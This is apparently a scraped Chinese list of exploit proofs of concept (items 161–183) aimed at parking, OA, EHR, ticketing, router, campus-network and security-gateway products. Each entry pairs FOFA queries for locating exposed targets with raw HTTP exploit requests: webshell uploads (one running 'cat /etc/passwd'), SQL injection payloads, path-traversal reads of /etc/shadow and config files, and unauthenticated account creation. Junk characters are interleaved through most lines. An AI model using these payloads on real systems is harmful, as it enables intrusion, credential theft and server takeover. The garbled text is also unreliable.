User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
1 U0 B# O) N; OConnection: close
, O9 K: k1 `6 \' y0 ?) F8 `Accept: */*
0 L+ @$ v  n$ L. G% gAccept-Language: en
9 P. j" v3 E7 _5 `Accept-Encoding: gzip! h! F3 I3 w0 U. ]

$ b0 T5 s4 r$ H
/ [; s/ D) e  g$ ]* B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传; @# P1 s( G# P0 @2 c- D8 K' N7 d: Q) ~  m
FOFA:body="/KT_Css/qd_defaul.css"
# r' k' c( F& }+ I2 n第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
& k9 T0 M' ]! g2 j8 lPOST /Webservice.asmx HTTP/1.1
( o% A3 v, ]- |2 K+ [; e/ d/ MHost: x.x.x.x
) ]5 _8 C) P% {+ a$ M1 o+ ]8 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
& a: }+ n& a! ]- f+ x( tConnection: close4 h1 ?3 F+ C8 Y0 q$ i
Content-Length: 445
. ^9 z* Y: J% T9 c5 @  PContent-Type: text/xml% w% z: g! A. f5 d' t9 p
Accept-Encoding: gzip
- M+ S7 u' g% R9 l7 z' G% z3 U, D  K5 B' T5 \& _- K
<?xml version="1.0" encoding="utf-8"?>  W4 B% q( P0 P) n
<soap:Envelope xmlns:xsi="
0 l! B/ c# d$ N) K1 J( `http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
$ J1 N6 `* y: d( g% Q0 zxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">) {$ F* E8 `' z
<soap:Body>! h0 [* _1 v* |  i6 Y
<UploadResume xmlns="http://tempuri.org/">" e" Z8 X! [7 \# r$ p  [8 q) U) k
<ip>1</ip>
7 u* S" M! ~% t  j! n<fileName>../../../../dizxdell.aspx</fileName>
  e8 A" \, P" n" m/ H<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
- ^0 ?9 o0 S9 t; a) r<tag>3</tag>
8 z' A7 ~' L+ |( k; t: Z</UploadResume>
* s8 w1 s! s5 R- r" i</soap:Body>) R: W3 T3 K- C
</soap:Envelope>
8 O" Y7 p: R3 f  M/ T. R2 _  V
2 _; w0 S8 [* h' ]" H6 C( b1 c. O
/ A  B; [3 Q( l' l' ]9 Xhttp://x.x.x.x/dizxdell.aspx
, f/ [# H  l5 h. s: `3 m: _
; M" I) C2 S6 E( q162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传9 q* o, `- G+ s( ?& u. R2 H
FOFA: app="和丰山海-数字标牌", ~6 z8 s7 c9 d! M. a0 R# z9 W
POST /QH.aspx HTTP/1.1
$ f& k+ W* k" k# K' LHost: x.x.x.x. q) v* ]/ S3 d8 |5 W9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
8 H7 _$ E; p( ~3 H& b" aConnection: close: E4 W: J6 N) z7 A0 {
Content-Length: 583/ O/ d% x4 a" r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey4 h9 G6 Z4 _. C& @
Accept-Encoding: gzip2 A3 B) W4 k) ]/ R* O( ~6 f

! ^5 B. r1 s# p  d+ k------WebKitFormBoundaryeegvclmyurlotuey, `5 S( V4 r1 k3 N5 c5 p
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx") C4 A" ]- R4 S& o! N& s
Content-Type: application/octet-stream$ A/ f% |+ m6 c% v6 o4 G' L  F
% R* ^% z1 I+ ?
<% response.write("ujidwqfuuqjalgkvrpqy") %>4 Z9 p) h0 l7 h/ N# g3 K
------WebKitFormBoundaryeegvclmyurlotuey( y5 g' }0 g( y7 ^6 Q$ n( _
Content-Disposition: form-data; name="action"' @$ T  Y: F, l# ^+ {( P- O  C
/ K: _; ~; w- {; p2 M: ^) a8 F0 A
upload
; z4 i) s1 J0 s3 m' Y" e5 m, I# `------WebKitFormBoundaryeegvclmyurlotuey* D! m0 Q3 f1 n7 T) r
Content-Disposition: form-data; name="responderId"
, X0 O. ^$ ^7 b; \- n; a. r4 E6 Q. J2 e, G3 Y9 P0 g" C, D, o
ResourceNewResponder7 `8 [& }, [1 u
------WebKitFormBoundaryeegvclmyurlotuey6 r$ }: Y' W4 p9 m, B& E7 W
Content-Disposition: form-data; name="remotePath"' R0 w4 v# }# m, h

3 Z  o0 M% \4 U" z/opt/resources) }  X7 d: t, ]9 c% d
------WebKitFormBoundaryeegvclmyurlotuey--
0 F6 ^% y3 Q- d: k; [* R, e! k6 V: a% r

5 e9 N0 C3 `' [. nhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
, w$ f* F: Z# k, ]% v! B3 z7 y
4 u- z6 M4 W" ^163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) H  o! n/ N3 ]2 `2 `& _( g) W6 l
FOFA: icon_hash="-795291075"
, j7 ~  o7 Q. L/ vPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
6 l# E2 M" X* \* B$ o; J" S  OHost: x.x.x.x
2 c) [. K! L$ N! z# J0 {) ?& ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36  r1 _* W7 ?* s" P" H5 \
Connection: close
7 O' w8 m7 `0 ]. JContent-Length: 2938 D- E0 _: Y2 ?8 O; t
Accept: */*
, F1 O% ~# e8 j8 J- F) |& RAccept-Encoding: gzip, deflate% t+ c6 J/ Z+ A  i
Accept-Language: zh-CN,zh;q=0.9
, D+ K, a0 J' N; MContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
) d8 @# |$ I; m$ W- b( l% Y% d+ r0 x- ~& C
------iiqvnofupvhdyrcoqyuujyetjvqgocod! X. x! ~# ]2 G9 `# N3 v8 I
Content-Disposition: form-data; name="name"
9 I2 N* S, Z8 N4 R5 V* e8 W
) _( q3 O/ ^  J" `% p" p1.php
0 e+ ]+ U6 M* ]9 J6 a------iiqvnofupvhdyrcoqyuujyetjvqgocod
7 p2 |3 Y* p/ P- M/ VContent-Disposition: form-data; name="upfile"; filename="1.php"
# [: ?8 `8 m  a- YContent-Type: image/jpeg
: p- y+ Z' e) r) [6 k5 i0 q  {$ Z! ]
' _( c* z& ~" W1 \! ?2 {0 arvjhvbhwwuooyiioxega
8 v+ `0 Q. M- j6 Y3 i5 e: D------iiqvnofupvhdyrcoqyuujyetjvqgocod--0 }) z! Q4 w2 e' O  X
! ^0 x; ~. {+ S" e* C6 F) U
, A4 c9 {0 r, |& o$ g* Y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传' Z5 S+ x# H3 [, M# `6 y8 o
FOFA: title="智慧综合管理平台登入"
1 B4 {- J; I* U/ I. Y9 s, d9 {  aPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1& I0 S- S& \# X6 k
Host: x.x.x.x+ ?/ O6 r. v, f8 K" T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
6 p& A4 ^- j- q9 y) j* N9 i4 ?Content-Length: 288
7 g9 R7 W, H: GAccept: application/json, text/javascript, */*; q=0.01
# n( @1 d5 ~; XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
( w$ `. [' s+ z2 @) M' j; B% U. qConnection: close4 g/ |5 p! w: Y0 U2 N- h
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl0 Z7 a- g9 x$ H8 M6 i3 s" E- k
X-Requested-With: XMLHttpRequest
6 I8 S9 V) N4 V6 q3 z, P) hAccept-Encoding: gzip
3 c- ?6 N: G1 ?. L
5 J' ?- Z& w& n  g; S4 `3 K------dqdaieopnozbkapjacdbdthlvtlyl9 m' t4 e8 p* `* |
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx": r' e) Q- d: A8 w+ V
Content-Type: image/jpeg
5 B0 N' Q& m9 L4 @3 U' o% c) H, N) H! @: b' h; e; @) T( v
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
1 O7 D0 f! b: t  m+ @; n6 k------dqdaieopnozbkapjacdbdthlvtlyl--3 A# C  T" W3 h/ k$ L# j
  E/ r0 ?# o0 O% c. z. v
1 A8 n6 i2 Z- U- }3 o
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
* H  p7 ~5 c% Y% l) ~1 w- l* ?" R7 A$ M  p
165. OrangeHRM 3.3.3 SQL 注入
/ M4 ]- v% d" {  r. f& ICVE-2024-36428
, K' |* v/ r8 c$ bFOFA: app="OrangeHRM-产品"
7 R3 F% T. f. p5 `) S( HURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))0 L1 o6 h7 E  k9 W' z1 y

1 w5 S; O1 I; r/ w: M
" A/ [- U% s, h* P% B5 s$ D/ P' T166. 中成科信票务管理平台SeatMapHandler SQL注入4 N" k; I# r2 Z0 q% ^0 T
FOFA:body="技术支持:北京中成科信科技发展有限公司"
# e7 Q+ W; j" |# ]) `POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.19 I4 ?6 Z% [+ I' P- i& p, |4 l
Host:
9 k, M0 ~1 V4 m2 K9 d+ F1 T& yPragma: no-cache( X% Y5 s9 ]1 i; _
Cache-Control: no-cache
( o: k3 X! Z; T" k8 `; iUpgrade-Insecure-Requests: 1
6 P3 R+ ^/ H% bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36; R+ G8 r3 G: x# \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 ?& ^7 F( r4 Q1 |# ^! t$ a
Accept-Encoding: gzip, deflate4 @, U; U" ]" B3 w# _# z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 W' Q- `9 r$ e$ p; tCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
9 H: L+ \/ j" Z8 gConnection: close
& {1 H% Z( o- N( @Content-Type: application/x-www-form-urlencoded
/ r% B. b5 U6 xContent-Length: 89
& |0 U& J& I* [5 N# u  M$ E4 I
- o- g; O* A1 FMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE# Q% |. I% k: S! S5 w- G4 Z
4 g1 W% Z0 @1 N6 z1 M0 u4 b: s

: I( I# [1 G8 X167. 精益价值管理系统 DownLoad.aspx任意文件读取0 C. ]7 X$ ~. x
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
7 M; Y+ [! k3 U7 D; dGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
3 w* `1 {; M/ t! b" D& k0 G6 M! ~1 @Host:" h6 m9 N8 G7 r5 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 \3 e* B% I9 m  ZContent-Type: application/x-www-form-urlencoded
# |) J- g' f+ }% dAccept-Encoding: gzip, deflate! |0 C" r" n  r0 q/ n4 L: y4 ~" g
Accept: */*
2 E+ k1 x  y, i& O$ bConnection: keep-alive
# L2 T" t+ ?) P# e1 e
1 w2 n/ b, r4 l4 M; x7 T2 L3 W. j4 ?1 T* l8 g* ~, b, G( ~
168. 宏景EHR OutputCode 任意文件读取* C. R4 F/ U* E0 n: A
FOFA:app="HJSOFT-HCM"- w/ n: Y4 `& @& f* x
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
: l1 j, N1 s. v* D0 r0 ]( rHost: your-ip
* }0 c; M! k. q" K1 s% b# iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.361 V" L' ]  j0 n
Content-Type: application/x-www-form-urlencoded& Z, N8 k2 l0 ~) X2 c3 |
Connection: close" i0 S2 V+ S) I

" o  Y! O3 V& n  B* D. {4 e9 j( j- N) t. d. F

, L& e8 z! x$ `169. 宏景EHR downlawbase SQL注入! w& e( I2 @; V' E: e, V
FOFA:app="HJSOFT-HCM"& n% p7 n% |9 g0 R* f
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1/ c3 t% G$ u- F$ N; L5 Z; u; M
Host: your-ip' C; f) \( I5 {. T" G1 s, {+ G2 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' r: n1 \9 I( m. y* N4 |5 HAccept: */*& I6 p& `* ^: T" @# p, K, k
Accept-Encoding: gzip, deflate
0 m# j0 O- F5 v( A* Z6 Z- z  v+ tConnection: close
& A0 j9 `. i6 `; q
( Y# D/ e% u* J0 g# ]
5 ?( M5 z4 `* U
: t. f& C( W. W! x170. 宏景EHR DisplayExcelCustomReport 任意文件读取
+ @1 I5 C7 r) S/ ?& S! dFOFA:body="/general/sys/hjaxmanage.js"
: Q7 ?' r% B7 K0 U$ gPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
# E4 {5 Q2 Q% ]$ V7 ?Host: balalanengliang9 k% O# O0 I4 z# Q- ?1 w! L
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* X7 g, H% s/ `4 F+ }) x# U" Z
Content-Type: application/x-www-form-urlencoded
* F+ A0 Q! T$ x- B* R3 s8 d, b0 Q* e) P! f) j
filename=../webapps/ROOT/WEB-INF/web.xml
3 h+ k; q4 P) x8 p
4 N8 G$ j1 d5 g1 i: S3 ~" |0 \7 X4 L7 c7 f5 O
171. 通天星CMSV6车载定位监控平台 SQL注入  v4 h3 t6 Z! W
FOFA:body="/808gps/"3 j+ |4 _, e& j2 q- q
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
8 ?9 N: o1 t! f4 w$ [Host: your-ip
! u0 s# J2 I, S8 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. `; T4 |1 k& P6 E7 S) XAccept: */*0 \; R, n5 e* ]2 a8 e) t# Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! r9 T7 ^- R/ f& FAccept-Encoding: gzip, deflate$ n9 j& |3 g- D2 I: ?1 I0 ?8 c* J
Connection: close( M' }  l7 ?& y, J2 p& T

: M4 ^/ b8 ]& @; N8 [
: c; F0 O9 m7 n6 c% M1 G; t: X" b9 T0 U6 c) E8 v
172. DT-高清车牌识别摄像机任意文件读取
% ?5 r4 Z. `2 v$ C$ KFOFA:app="DT-高清车牌识别摄像机"
/ z; c! w: k9 ]0 `1 c. V2 ~, {GET /../../../../etc/passwd HTTP/1.1* w" |: l" {$ u% D+ V; R
Host: your-ip' a! j, p- }7 `3 V& `- Z% h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ C: X! Y- Z: s- G: M! N, {. SAccept-Encoding: gzip, deflate3 c8 H0 Q8 v" W8 B, i; R: Q! Y
Accept: */*
2 a6 L; V: ^. y. M* DConnection: keep-alive2 M) N" G# y1 y

6 V( v$ H8 a2 T9 P* H
  u; N% N2 l$ e& ], z: G5 B* i$ D- E; m
173. Check Point 安全网关任意文件读取
. {- x, f# o' C: u5 n9 ECVE-2024-24919
" f& Z% D2 N- o) ]FOFA:app="Check_Point-SSL-Network-Extender"
0 c/ l% C% m( f4 L4 U( X/ NPOST /clients/MyCRL HTTP/1.1
! n: E# r* g) \. R$ PHost: your-ip" U; L5 v# a* t
Content-Type: application/x-www-form-urlencoded
) p) k6 z* q( x* M5 S  P/ @- S4 z
aCSHELL/../../../../../../../etc/shadow
, L# X5 p; v2 c3 B% ~& h/ L
) ]! d4 g: i# U; ?2 S" ~& M' C8 q& |" O! {

; ~5 l6 s/ q" T( S' G+ q174. 金和OA C6 FileDownLoad.aspx 任意文件读取+ d" j: t. r! M5 A
FOFA:app="金和网络-金和OA"( f" R3 x! u; {
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1" n7 P1 {  p3 B( Y3 n6 T; C
Host: your-ip
, L8 z9 d- Q( G; Z( S% l2 q9 Y' UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 E& d( ?* m& h# T9 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% R, q) {. |2 P% ^3 ]Accept-Encoding: gzip, deflate, br7 I8 @; x/ `  d4 p) z7 o
Accept-Language: zh-CN,zh;q=0.97 N4 k8 F" R9 z3 p: u
Connection: close& A3 I* O" r6 h
+ j# T# @1 b6 Q8 s7 c% j5 u

* P5 Z$ z3 ~2 i% c8 X! B4 b
1 l# |# E% t5 n4 k+ C1 o; ]$ x175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
6 Z5 d0 ]' z  \) N, {! o* tFOFA:app="金和网络-金和OA"
: c) J, }/ r. L# k: W7 IGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.15 n9 B& t+ h* x
Host:
; ~8 e9 s# E5 G! g" n5 |% K+ }( {. [User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 L. ?6 G; `5 E6 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) B; \- T# w  P9 E# \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* O* A# z! N# A  xAccept-Encoding: gzip, deflate
) ]8 }9 Y3 D% m# z3 n" k* iConnection: close
, e0 ]- D, Z; e0 r! U/ xUpgrade-Insecure-Requests: 1
& k  L- \/ O& A7 p3 @: P/ ^0 W3 u: L+ q/ q0 L( a- V

# M( X- @! g- z* v0 F7 H7 R- _- {176. 电信网关配置管理系统 rewrite.php 文件上传
) u& K7 K9 h' G: l4 lFOFA:body="img/login_bg3.png" && body="系统登录"( u9 X% ?% }- \6 Y! y; a7 ^7 K
POST /manager/teletext/material/rewrite.php HTTP/1.1" e2 Y# \) H0 A, S, u& K
Host: your-ip' n6 H4 w4 M( U  ]; Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& d" b$ U, ?+ s  h% X" d9 i9 VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT$ L8 Q9 b- a5 p; V- {/ x) E! A- i
Connection: close
- e  Q2 r+ ?, b3 O" p' F$ ^) Z4 ?' k. e/ Y9 H* z8 @! v1 ?
------WebKitFormBoundaryOKldnDPT* F' G8 l' [( w0 u* ]) F. E
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
" j+ y+ z9 J! P. E8 aContent-Type: image/png. m0 [* c4 C$ e0 ]
: _" j7 s& A8 F! D
<?php system("cat /etc/passwd");unlink(__FILE__);?>
9 E$ ^7 c: ]" _' L  g; c------WebKitFormBoundaryOKldnDPT$ a# Y' A# g6 P$ `9 }
Content-Disposition: form-data; name="uploadtime"
1 c2 W  H! x  q3 [" j4 x9 e: ` - J6 A5 G; N9 S7 o* V& ]- g" q

# \5 t0 u; h* d* g$ z0 ~' G/ \------WebKitFormBoundaryOKldnDPT--
5 T3 p6 G$ t" r' G3 \
6 m9 z2 Z& p' ]( g( R
4 x& M7 c( r' e$ }
  }, P2 O( W: p4 j/ v* W: m* r9 P" D177. H3C路由器敏感信息泄露
8 O0 T' x1 J. {" G) F( k+ [, \/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 {+ D6 t# R( E0 Q/userLogin.asp/../actionpolicy_status/../M60.cfg( v* ^' w- D& j* ?1 h
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
* G$ N1 ]7 F$ q2 T/userLogin.asp/../actionpolicy_status/../GR5200.cfg
' G6 ~3 _2 L8 V/userLogin.asp/../actionpolicy_status/../GR3200.cfg8 ^2 j, q( }. I4 m, {# R& Q
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
0 ~1 I) q3 G7 V+ d/ ~, \+ e, x/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
6 I0 a+ s+ r, t2 {# P  j! [; W/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 O6 w4 V5 i3 K9 ?- Z" I/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
( [4 c( s( W  ?/ C) A- ~/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg3 w, U2 s( M8 W0 A7 E, g
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
1 L/ H* c  @& e4 T9 E* ?/userLogin.asp/../actionpolicy_status/../ER5100.cfg
4 _8 b7 V* e7 M) u/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg: ]; Y4 q& O3 ^4 m0 a
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
2 S4 {7 o! D& X4 n& x. ^6 H/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
- t+ i7 Z2 _5 G: k- }1 g/userLogin.asp/../actionpolicy_status/../ER3200.cfg7 [/ {3 F- G+ k( R& f) M
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg" E$ @  B6 b8 p. u) t
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg9 W8 M1 y1 g' S2 r" N$ a
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
7 v5 |9 x% _& W- C2 C. U& l* Q, z# B/userLogin.asp/../actionpolicy_status/../ER3100.cfg
3 s9 ^  X% O9 [5 Z) t1 D/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
8 K) s  Q+ a# x8 H  ]9 r8 z
& p( O; o# _& S5 Y
+ X$ q! `7 O/ }; ]178. H3C校园网自助服务系统-flexfileupload-任意文件上传
: M8 H" G0 v: X! E; {FOFA:header="/selfservice"3 R. A% R, J, f
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
1 W5 `5 a8 \  F- I8 j# THost:
2 n& M: E' g  Z: h2 O2 ?/ d/ i) qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36+ h$ c5 S  O! n: d9 E: p4 ~
Content-Length: 252: c" S/ w6 {2 G
Accept-Encoding: gzip, deflate  T# o( ?6 Y% i* \, i, v( i
Connection: close
: i+ M5 H* K' K$ Y7 t$ IContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 t& |0 b3 H& g$ O+ x& A, z-----------------aqutkea7vvanpqy3rh2l9 D5 g0 `3 d% d4 W
Content-Disposition: form-data; name="12234.txt"; filename="12234"
( ?& O* n7 N* I- d- E" mContent-Type: application/octet-stream- ~3 T- N, h) f+ l- u: j& n
Content-Length: 255: w% r* Q# F: v6 s, Z3 M8 l
& R8 ?2 m9 H& u) b* x3 o5 m
12234
* W* m1 W* I6 c; M-----------------aqutkea7vvanpqy3rh2l--/ ~8 Q% X  q# ?+ g; e

; {7 s% X/ z* R+ p7 w; d2 o, `8 u
GET /imc/primepush/%2e%2e/flex/12234.txt
/ y( l# w; P& }5 c. z  K+ u) K  w# z7 ^8 ?6 k2 e! d* L

6 W/ {0 ~3 x" p/ J. R179. 建文工程管理系统存在任意文件读取, Q$ y9 L1 k6 M6 U
POST /Common/DownLoad2.aspx HTTP/1.1
; h" d) }" u6 F4 _6 gHost: {{Hostname}}
/ v: H" S' X0 g/ nContent-Type: application/x-www-form-urlencoded
7 G5 F& C$ I" F! r7 F8 W! OUser-Agent: Mozilla/5.0
1 |: u! h: U# T1 z) M
: a0 v* ]; C! Q1 c: w/ ?3 ~path=../log4net.config&Name=
6 z6 V- |3 Z: H1 g, i. E) F. u* F+ \8 p* c3 S4 n8 c
2 q$ h1 C# g2 O7 Y
180. 帮管客 CRM jiliyu SQL注入+ ?/ ?" L0 K4 Z# m' E2 U0 K
FOFA:app="帮管客-CRM"
" _' a7 S# Y0 p- |$ jGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.12 ]: G. _% R- t" u* ?: I
Host: your-ip4 N- Z7 u* s$ m1 b; t  `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( U1 p4 _" D! Y+ A* Q+ d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 n" r, `. s, ^; Z0 P" H
Accept-Encoding: gzip, deflate% N1 z, Z/ D9 Z% [
Accept-Language: zh-CN,zh;q=0.9
8 z" X8 @$ F8 u# b8 q! TConnection: close
! a$ @; i8 q0 P$ W7 c; A
; B; L7 @: n8 i  a8 F4 V/ t- c; |' D. P2 o, o2 e  p: Z! P; ?0 H" D
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
/ y3 `: r" n, @3 j5 q1 ^; ~FOFA:"PDCA/js/_publicCom.js"
" E) B2 w& A9 Y  k, W6 gPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
( M" t0 G  U* I! D7 z) a4 \* yHost: your-ip
+ ?) |3 h' R$ I1 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
. n' r( v, U( C+ ~* w$ WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 P. w: D* Z7 f6 ^+ J  E
Accept-Encoding: gzip, deflate, br
9 P; Y1 z, @5 d9 ?/ K! m8 B& {8 sAccept-Language: zh-CN,zh;q=0.9* h" c; Q! d9 w# A% p# G
Connection: close& n' O& o9 k& I5 M3 M
Content-Type: application/x-www-form-urlencoded5 C' V; M- Z' k$ c+ k

3 h* v$ ~) l0 M8 _/ l
# K3 C( ?) {. jaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
' K  Q, C  h; R1 a/ a" h% @3 W  F* G, `6 D: o; X- i
( x" p" v2 ^. Q( e
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建+ c. ~3 E& X' C7 M2 I
FOFA:"PDCA/js/_publicCom.js"
, W+ `- ^; |; ]) W( D8 uPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
0 g% O  u# j6 {* N0 q% ~Host: your-ip" Y2 i$ g( j6 k- Q( j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
, ^# z( W1 o# C9 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ L- A, s3 y7 j# w4 b% GAccept-Encoding: gzip, deflate, br9 @. m) `* S) B, ]6 e  f
Accept-Language: zh-CN,zh;q=0.9
1 l. B- q) |3 I. NConnection: close
2 Z% }8 B5 X9 ^$ BContent-Type: application/x-www-form-urlencoded
; E! u; O& q" M1 K
  z/ E7 _& Q. `8 C( g% |: V2 X& J* n
6 r/ c  Z' i+ x$ D) z/ l3 pusername=test1234&pwd=test1234&savedays=1
5 q) ]- F. |/ k9 q9 @. _( W. [
" f- ~1 Y# p" C$ L* M7 R& G+ ~/ _- t
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入, e2 B: i& X6 T/ ~% _( c% \
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
9 {9 D% e9 q3 M& x5 T  x& ZGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1$ Z4 G" ]+ v' m8 k- A& k
